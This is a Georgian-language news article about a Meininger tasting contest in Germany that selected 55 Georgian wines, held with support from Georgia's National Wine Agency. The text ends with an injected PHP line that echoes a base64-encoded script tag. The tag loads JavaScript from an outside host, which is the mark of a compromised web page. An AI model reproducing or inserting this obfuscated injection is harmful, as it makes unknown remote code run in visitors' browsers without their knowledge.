celsiusi
ავერსი შნაიდერი
ღვინის სფეროში ერთ-ერთი ყველაზე პრესტიჟული გერმანული მედია ჰოლდინგის "Meininger" ჟურნალში „Sommelier”, ქართული ღვინის შესახებ სტატია გამოქვეყნდა.
 
როგორც Business Time-ს ღვინის ეროვნული სააგენტოდან აცნობეს, ღვინის ეროვნული სააგენტოს მხარდაჭერითა და გერმანული მარკეტინგული კომპანიის „ff.k Public Relations“ ორგანიზებით, მედია ჰოლდინგმა „Meininger“ საუკეთესო ქართული ღვინოების შესარჩევად კონკურსი-დეგუსტაცია ჩაატარა.
 
კონკურსში ქართული ღვინის მწარმოებელი 83 კომპანიის სხვადასხვა დასახელების ქვევრისა და კლასიკური მეთოდით დაყენებული საფერავის 152 ღვინო მონაწილეობდა, საიდანაც 55 საუკეთესო შეირჩა.
 
 
შერჩეულ ღვინოებზე სტატია უკვე დაიბეჭდა „Meininger“-ის ჟურნალის „Weinwirtschaft“ ივნისის ნომერში. კონკურსი-დეგუსტაცია გერმანიის ქალაქ ნოიშტადტში მაისში გაიმართა - მიზანი საქართველოდან წარდგენილ ღვინოებს შორის საუკეთესოების შერჩევა და გერმანიის ბაზარზე პოპულარიზაციაა.
 
ქართული ღვინის პოპულარიზაციისა და საექსპორტო პოტენციალის გაზრდის მიზნით, გერმანული კომპანიასთან „ff.k Public Relations” ღვინის ეროვნული სააგენტომ თანამშრომლობა 2021 წლიდან დაიწყო.
1110
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");